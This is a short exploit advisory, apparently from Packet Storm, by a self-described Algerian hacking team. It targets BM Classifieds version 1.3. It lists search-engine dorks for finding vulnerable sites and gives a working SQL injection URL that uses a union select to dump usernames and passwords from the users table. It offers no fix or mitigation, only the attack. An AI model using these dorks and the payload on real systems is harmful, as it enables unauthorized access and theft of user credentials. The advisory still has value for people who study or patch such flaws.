BM Classifieds Ads suffers from a remote SQL injection vulnerability.
8f0f8a6e4f98db33741739c1e64a3445ae5dbbb5f7416dc0b3571777080b1177 ALGERIAN HACKER
**********************- NORTH-AFRICA SECURITY TEAM -***********************
[!] BM Classifieds ads SQL injection vulnerability
[!] Author : Dr.0rYX & Cr3w-DZ
[!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de
***************************************************************************/
[ Software Information ]
[+] Vendor : http://www.bmscripts.com/
[+] script : powered by BM Classifieds
[+] Demo : http://classifieds.bmscripts.com/
[+] Version() : 1.3
[+] Vulnerability : SQL injection
[+] Dork :inurl:"classifieds.php?cat="
inurl::"showad.php?listingid="
**************************************************************************/
[ Vulnerable File ]
http://server/classifieds.php?cat=[N.A.S.T ]
[ Exploit ]
http://server/classifieds.php?cat=144+union+select+username,password,3,4+from+users
[ GReet ]
[+] :xcv-dz , CLAW , kader11000 ,le0n , exploit-db.com , ALL HACKERS MUSLIMS
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed